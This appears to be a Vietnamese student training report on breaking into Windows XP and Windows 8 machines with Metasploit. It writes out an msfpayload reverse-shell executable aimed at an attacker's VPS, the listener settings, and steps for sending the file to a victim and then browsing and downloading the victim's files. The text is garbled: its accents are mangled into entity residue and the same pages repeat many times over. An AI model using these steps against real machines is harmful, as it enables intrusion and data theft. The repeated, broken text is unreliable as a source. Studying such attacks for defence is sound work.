Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
